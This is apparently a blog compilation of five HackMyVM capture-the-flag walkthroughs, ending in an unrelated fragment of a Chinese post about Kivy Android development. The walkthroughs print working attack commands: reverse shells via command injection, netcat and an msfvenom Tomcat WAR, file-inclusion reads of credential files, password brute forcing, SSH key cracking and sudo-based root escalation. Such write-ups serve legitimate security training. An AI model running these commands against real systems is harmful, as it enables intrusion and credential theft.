HackMyVm Method Walkthrough

HackMyVm Method Walkthrough

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.0025s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 4b:24:34:1f:41:10:88:b7:5a:6a:63:d9:f6:75:26:6f (RSA)
 |   256 52:46:e7:20:68:c1:6f:90:2f:a6:ad:ee:6d:87:e7:28 (ECDSA)
 |_  256 3f:ce:97:a9:1e:f4:60:f4:0e:71:e7:46:58:28:71:f0 (ED25519)
 80/tcp open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: Test Page for the Nginx HTTP Server on Fedora
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80, remember to enable .htm ext.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .htm,.html,.php,.txt,.php.bak,.bak,.zip -b
401,403,404,500 --wildcard -o 80.log --exclude-length 3690

/index.htm (Status: 200) [Size: 344]
/note.txt (Status: 200) [Size: 23]
/secret.php (Status: 302) [Size: 0]
[--> https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg]```;

Check source code of index.htm.

```bash
~ curl http://192.168.56.100/index.htm fish-0 | 0 [09:45:55]
<h1>It's Hacking Time</h1>
<img src="hacker.gif" alt="Hacker" height="640" width="640">
<img hidden="true" src="office.gif" alt="hahahahaha" height="640" width="640">
<form action="/secret.php" hidden="true" method="GET">
<input type="text" name="HackMyVM" value="" maxlength="100"><br>
<input type="submit" value="Submit">
</form>


With the hint from index.htm, we can call secret.php with param HackMyVM.

 ```bash
~ curl 'http://192.168.56.100/secret.php?HackMyVM=id'  
 Now the main part what it is loooooool<br>Try other method⏎

Seem get method is no correct. Let's try post method.

```bash
~ curl 'http://192.168.56.100/secret.php'; -d 'HackMyVM=id'
You Found ME : - (<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>⏎


Then we can get reverse shell.

 ```bash
~ curl 'http://192.168.56.100/secret.php' -d 'HackMyVM=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5B%22%2fbin%2fbash%22,%22-i%22%5D);%27'
 ──────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/method 0 [10:05:51]
 ~ nc -nvlp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45958.
 bash: cannot set terminal process group (333): Inappropriate ioctl for device
 bash: no job control in this shell
 www-data@method:~/html$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 www-data@method:~/html$

Check source code of secret.php

```bash
www-data@method:~/html$ cat secret.php
cat secret.php
<?php
...
else {
header("Location: https://images-na.ssl-images-amazon.com/images/I/31YDo0l4ZrL._SX331_BO1,204,203,200_.jpg";);
}
$ok="prakasaka:th3-!llum!n@t0r";
?>


Escalate to user prakasaka.

 ```bash
www-data@method:~/html$ su prakasaka
 su prakasaka
 Password: th3-!llum!n@t0r
 id
 uid=1000(prakasaka) gid=1000(prakasaka) groups=1000(prakasaka),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth)

Log in ssh as user prakasaka, check sudo -l.

```bash
prakasaka@method:~$ sudo -l
Matching Defaults entries for prakasaka on method:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User prakasaka may run the following commands on method:
(!root) NOPASSWD: /bin/bash
(root) /bin/ip


We can get root.

 ```bash
prakasaka@method:~$ sudo ip netns add foo
 prakasaka@method:~$ sudo ip netns exec foo /bin/sh

 # id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 method

HackMyVm Breakout Walkthrough

HackMyVm Breakout Walkthrough

Key points: good enum

https://hackmyvm.eu/machines/machine.php?vm=Breakout

Scan ports.

 ~ nmap -sV -sC -p-  -Pn 192.168.33.145  -oN ports.log    
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.                              
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST                                                              
 Nmap scan report for 192.168.33.145                            
 Host is up (0.0022s latency).                                  
 Not shown: 65530 closed ports                                  
 PORT      STATE SERVICE     VERSION                            
 80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
 |_http-server-header: Apache/2.4.51 (Debian)                  
 |_http-title: Apache2 Debian Default Page: It works            
 139/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 445/tcp   open  netbios-ssn Samba smbd 4.6.2                  
 10000/tcp open  http        MiniServ 1.981 (Webmin httpd)                                                                    
 |_http-title: 200 — Document follows                    
 20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
 |_http-title: 200 — Document follows
 Host script results:                                          
 |_clock-skew: 7h59m58s                                        
 |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:                                          
 |   2.02:                                                      
 |_    Message signing enabled but not required                
 | smb2-time:                                                  
 |   date: 2021-10-22T22:03:10                                  
 |_  start_date: N/A                                            

Check source code of index.html at port 80.

<!--
 don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

 ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

 -->

It's brainfuck code. Decode it online, get string `".2uqPEfj3D<P'a-3"`.

Use enum4linux to enum.

```bash
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)


With username cyber and password we decode from brainfuck code, we can login at port 20000.

In control panel, we found command shell.

image-20211022224903817.png

Run "nc 192.168.33.128 1234 -e /bin/bash", we can get reverse shell.

 ```bash
~ nc -nlvp 1234                                                                                          fish-0 | 0 [22:47:24]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.33.145.
 Ncat: Connection from 192.168.33.145:35206.
 id
 uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 python3 -c 'import pty;pty.spawn("/bin/bash")'
 cyber@breakout:~$

Search cap.

```bash
cyber@breakout:/$ getcap / -r 2>/dev/null
getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep


And we found password backup.

 ```bash
cyber@breakout:/tmp$ ls -la /var/backups
 ls -la /var/backups
 total 12
 drwxr-xr-x  2 root root 4096 Oct 20 07:49 .
 drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
 -rw-------  1 root root   17 Oct 20 07:49 .old_pass.bak

We can compress it can extract it in /tmp folder using /home/cyber/tar.

 cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar -cvf pass.tar /var/backups
 /home/cyber/tar: Removing leading `/' from member names
 /var/backups/
 /var/backups/.old_pass.bak
 cyber@breakout:/tmp$ tar -xvf pass.tar
 tar -xvf pass.tar
 var/backups/
 var/backups/.old_pass.bak
 cyber@breakout:/tmp$ cd var/backups
 cd var/backups
 cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
 cat .old_pass.bak
 Ts&4&YurgtRX(=~h

Finally we get root.

```bash
root@breakout:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout

HackMyVm Taurus Walkthrough

HackMyVm Taurus Walkthrough

Keypoints: generate custom dic, tcpdump, IPv6

https://hackmyvm.eu/machines/machine.php?vm=Taurus

Scan ports first, only 21 and 22 open, and 21 is filtered.

 nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00082s latency).
 Not shown: 65533 closed ports
 PORT   STATE    SERVICE VERSION
 21/tcp filtered ftp
 22/tcp open     ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
 |   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
 |_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan udp ports, we found snmp port is open.

 nmap -sU --top-ports 200 -oN udp_ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00089s latency).
 Not shown: 198 closed ports
 PORT    STATE         SERVICE
 68/udp  open|filtered dhcpc
 161/udp open|filtered snmp

Use snmpwalk to get info from port 161, now we know the name sarah.

 ~ snmpwalk -v 1 -c public 192.168.56.100    
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (1183326) 3:17:13.26
 iso.3.6.1.2.1.1.4.0 = STRING: "Sarah <sarah@hmv.org>"
 iso.3.6.1.2.1.1.5.0 = STRING: "\"I Love My Name, Don't You, Little Hackers ?\""
 iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
 iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01

...

Here is the tricky part. In order to brute force ssh password of sarah, we need a password dic, which can be generated by cupp. First name is sarah, the rest part input nothing.

~ cupp -i        
  ___________                                                                              
    cupp.py!                 # Common
       \                     # User
        \   ,__,             # Passwords
         \  (oo)____         # Profiler
            (__)    )\    
               ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                             [ Mebus | https://github.com/Mebus/]

 [+] Insert the information about the victim to make a dictionary
 [+] If you don't know all the info, just hit enter when asked! ;)

 > First Name: sarah
 > Surname:
 > Nickname:
 > Birthdate (DDMMYYYY):
 ...

Successfully get the password of sarah.

```bash
~ hydra -l sarah -P sarah.txt -e nsr 192.168.56.100 ssh -t64 -F
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-21 11:34:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:1/p:111), ~2 tries per task
[DATA] attacking ssh://192.168.56.100:22/
[22][ssh] host: 192.168.56.100 login: sarah password: Sarah_2012
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-21 11:34:26


In sarah's home folder, found a file default.tar, which is unreadable now.

 ```bash
sarah@taurus:~$ ls -la
 total 32
 drwx------ 2 sarah sarah 4096 Oct 20 17:14 .
 drwxr-xr-x 4 root  root  4096 Oct 16 19:17 ..
 lrwxrwxrwx 1 root  root     9 Oct 16 19:56 .bash_history -> /dev/null
 -rw-r--r-- 1 sarah sarah  220 Oct 16 08:53 .bash_logout
 -rw-r--r-- 1 sarah sarah 3526 Oct 16 08:53 .bashrc
 -rw-r--r-- 1 root  root  4608 Oct 20 17:09 default.tar
 -rw-r--r-- 1 sarah sarah  807 Oct 16 08:53 .profile
 -rw------- 1 sarah sarah  104 Oct 20 17:14 .Xauthority

Check sudo -l of user.

```bash
sarah@taurus:~$ sudo -l
Matching Defaults entries for sarah on taurus:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sarah may run the following commands on taurus:
(marion : marion) NOPASSWD: /usr/bin/bash /opt/ftp


Try to run it.  The ftp port opened and closed again quickly.

 ```bash
sarah@taurus:~$ sudo -u marion /usr/bin/bash /opt/ftp
 ftp connection opened.
 ftp connection closed.

Open another ssh terminal, run tcpdump to get data.

```bash
sarah@taurus:~$ tcpdump -i lo -nn -A
...
17:03:43.659795 IP6 ::1.21 > ::1.34582: Flags [P.], seq 36:70, ack 14, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 34: FTP: 331 Password required for marion
`....B.@.....................................H*9.........J.....
.{wh.{wh331 Password required for marion

17:03:43.659802 IP6 ::1.34582 > ::1.21: Flags [.], ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3615192936],
length 0
`.EX. .@.........................................H*[.....(.....
.{wh.{wh
17:03:43.659819 IP6 ::1.34582 > ::1.21: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 18: FTP: PASS ilovesushis
...


Escalate to user marion, check sudo -l again.

 ```bash
sarah@taurus:~$ su marion
 Password:
 marion@taurus:/home/sarah$ sudo -l
 Matching Defaults entries for marion on taurus:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User marion may run the following commands on taurus:
     (ALL : ALL) NOPASSWD: /usr/bin/ptar

Use ptar to pack /root/ to /tmp/, then extract it use tar.

```bash
marion@taurus:/tmp$ sudo /usr/bin/ptar -cvf root.tar /root/
/root
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ tar -xvf root.tar -C ./
tar: Removing leading `//' from member names
//root
tar: Removing leading `/' from member names
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ cat ./root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuhCb4PqUqWAgQROGlOfqHiE9bBbe+bavDZjpFidqVJYxX5Jm9Mv/
e0R4R/1zwXxz0JdPAMZUOS8W9oiuc3TQ+seOp6vWKdLRd98bDycruGpbgMzHF0kULDeCN
...


Get root with ssh.

 ```bash
marion@taurus:/tmp$ ssh root@localhost -i root/.ssh/id_rsa
 Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sat Oct 16 21:20:06 2021
 root@taurus:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 taurus

HackMyVm Tom Walkthrough

HackMyVm Tom Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tom

Key points: tomcat configuration and upload

Scan ports.

~ nmap -sV -sC -p-  -Pn 192.168.56.100  -oN ports.log                                      
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        

<!--more-->

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/tomcat.php (Status: 200) [Size: 0]


Fuzz tomcat.php.

 ```bash
~ wfuzz -u 'http://192.168.56.100/tomcat.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000007570:   200        27 L     39 W       1441 Ch     "filez"  

Get /etc/passwd.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
...
tomcat:x:1001:1001::/opt/tomcat:/bin/false


We need to get home dir of tomcat.

 ```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/systemd/system/tomcat.service'                    fish-0 | 0 [10:29:59]
 [Unit]
 Description=Tomcat 9 servlet container
 After=network.target

 [Service]
 Type=forking

 User=tomcat
 Group=tomcat

 Environment="JAVA_HOME=/usr/lib/jvm/default-java"
 Environment="JAVA_OPTS=-Djava.security.egd=file:///dev/urandom"

 Environment="CATALINA_BASE=/opt/tomcat/latest"
 Environment="CATALINA_HOME=/opt/tomcat/latest"
 Environment="CATALINA_PID=/opt/tomcat/latest/temp/tomcat.pid"
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

 ExecStart=/opt/tomcat/latest/bin/startup.sh
 ExecStop=/opt/tomcat/latest/bin/shutdown.sh

 [Install]
 WantedBy=multi-user.target

Check password file at tomcat HOME dir.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml';
...
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
</tomcat-users>


Generate reverse shell for tomcat and upload.

 ```bash
~ msfvenom  -p java/shell_reverse_tcp lhost=192.168.56.150 lport=1234 -f war -o rev.war      
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war

 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.56.100:8080/manager/text/deploy?path=/upload'
 OK - Desplegada aplicación en trayectoria de contexto [/upload]

Get reverse shell.

```bash
~ curl 'http://192.168.56.100:8080/upload/rev.war';
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234 fish-0 | 0 [10:48:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:52234.
id
uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)


Check sudo -l.

 ```bash
tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85

Read id_rsa of user nathan.

```bash
sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0
<~/M/P+/ODlr8PUC+;aDO&;FsnT<(.p&79M2o/M/O]:i^Ja/Q@"7ANCqj/4E<$;HZgq777JN78#4(DJ!fJ+@JXs/O`&r1G(s\6S()K2Dm...


Decode ascii85 online, then get id_rsa.

 ```bash
-----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45

 pbcIb9gxpAhVFNik1U4P7SK+WnXji8QFUh11KM0oL8TXesjh+eRNlkHuYBvmm7rI
 ...

Decrypt id_rsa.

```bash
~ /usr/share/john/ssh2john.py id_rsa > hash
~ john --wordlist=/usr/share/wordlists/rockyou.txt hash bash-0 | 1 [11:08:11]
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
darkness (id_rsa)
1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
Session aborted


Login ssh as usr nathan, check sudo -l.

```bash
 ~ ssh nathan@192.168.56.100 -i id_rsa                                                                 john-0 | 1 [11:08:54]
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp

Get root.

nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 tom
 root@tom:/home/nathan# 

HackMyVm Hat Walkthrough

HackMyVm Hat Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hat

Key points: IPv6

Nmap scan ports.

nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT      STATE    SERVICE VERSION
 22/tcp    filtered ssh
 80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 65535/tcp open     ftp     pyftpdlib 1.5.4
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |  Connected to: 192.168.56.100:65535
 |  Waiting for username.
 |  TYPE: ASCII; STRUcture: File; MODE: Stream
 |  Data connection closed.
 |_End of status.

Scan port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 10701]
/logs (Status: 301) [Size: 315] [--> http://192.168.56.100/logs/]
/php-scripts (Status: 301) [Size: 322] [--> http://192.168.56.100/php-scripts/]


Scan php-scripts, found file.php.

 ```bash
~ gobuster dir -u http://192.168.56.100/php-scripts -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o scripts.log
 /index.html           (Status: 200) [Size: 7]
 /file.php             (Status: 200) [Size: 0]

Fuzz the param of file.php.

```bash
~ wfuzz -u 'http://192.168.56.100/php-scripts/file.php?FUZZ=/etc/passwd'; -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0

ID Response Lines Word Chars Payload

000000713: 200 26 L 38 W 1404 Ch "6"


Get user name.

 ```bash
~ curl 'http://192.168.56.100/php-scripts/file.php?6=/etc/passwd'      
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin            
 ...
 cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash

Scan folder logs. Get ftp user name from vsftpd.log

```bash
~ gobuster dir -u http://192.168.56.100/logs -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,log -b 401,403,404,500
--wildcard -o logs.log
...

/index.html (Status: 200) [Size: 4]
/vsftpd.log (Status: 200) [Size: 1834]


Bruteforce password of ftp.

```bash
 ~ hydra -l ftp_s3cr3t -P /usr/share/wordlists/rock_ascii.txt -e nsr 192.168.56.100 -s 65535  ftp -t64 -F           ...
 [65535][ftp] host: 192.168.56.100   login: ftp_s3cr3t   password: cowboy

Get 2 files: note and id_rsa.

~ cat note                                                                              

 Hi,

 We have successfully secured some of our most critical protocols ... no more worrying!

 Sysadmin

Port 22 is filtered. We can not connect it directly, but it is open. So let's try IPV6.

Modify /etc/sysctl.conf to enable IPv6. inet6 means IPv6 is enabled.

```bash
~ cat /etc/sysctl.conf
...
net.ipv6.conf.all.disable_ipv6 = 0
net.ipv6.conf.default.disable_ipv6 = 0
net.ipv6.conf.lo.disable_ipv6 = 0
~ ifconfig
...
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.150 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::ff1:d602:48fd:2485 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:35:d5:69 txqueuelen 1000 (Ethernet)
...


Find machines in local link IPv6 network.

 ```bash
~ ping6 -c2 -n -I eth1 ff02::1  
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=1 ttl=64 time=0.033 ms
 64 bytes from fe80::a00:27ff:fe17:10a4%eth1: icmp_seq=1 ttl=64 time=0.615 ms
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=2 ttl=64 time=0.049 ms

Test if the machine can be visited from ipv6 address.

```bash
~ nmap -p- fe80::a00:27ff:fe17:10a4%eth1 -6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 15:23 CST
Nmap scan report for fe80::a00:27ff:fe17:10a4
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
~ curl 'http://[fe80::a00:27ff:fe17:10a4%eth1]/index.html';
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">;
<html xmlns="http://www.w3.org/1999/xhtml">;
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
...


Decrypt id_rsa.

 ```bash
$ python2 /usr/share/john/ssh2john.py id_rsa  > crack.txt
 $ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 ilovemyself      (id_rsa)
 1g 0:00:00:11 46.01% (ETA: 20:23:54) 0.09082g/s 607973p/s 607973c/s 607973C/s katim03..katilsimbu_1
 Session aborted

Login ssh through ipv6.

```bash
~ ssh cromiphi@fe80::a00:27ff:fe17:10a4%eth1 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/cromiphi/.Xauthority does not exist
cromiphi@Hat:~$


Check sudo -l.

 ```bash
cromiphi@Hat:~$ sudo -l
 Matching Defaults entries for cromiphi on Hat:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cromiphi may run the following commands on Hat:
     (root) NOPASSWD: /usr/bin/nmap

Get root.

```bash
cromiphi@Hat:~$ echo 'os.execute("/bin/bash -i")' > exp
cromiphi@Hat:~$ sudo nmap --script=exp
Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-13 10:38 CEST
NSE: Warning: Loading 'exp' -- the recommended file extension is '.nse'.
root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
Hat

Kivy/KivyMD开发Andoird程序的一些踩坑记录

之前用python做了个命令行的爬虫,在安卓上运行时还得打开termux,用上虚拟键盘,很不方便,于是一直想改为Android版本的。近期刚发现Kivy/KivyMD可以基于Python进行跨平台开发,国庆期间进行了尝试。在此记录一些踩坑经历,供有相同需求的同学参考。

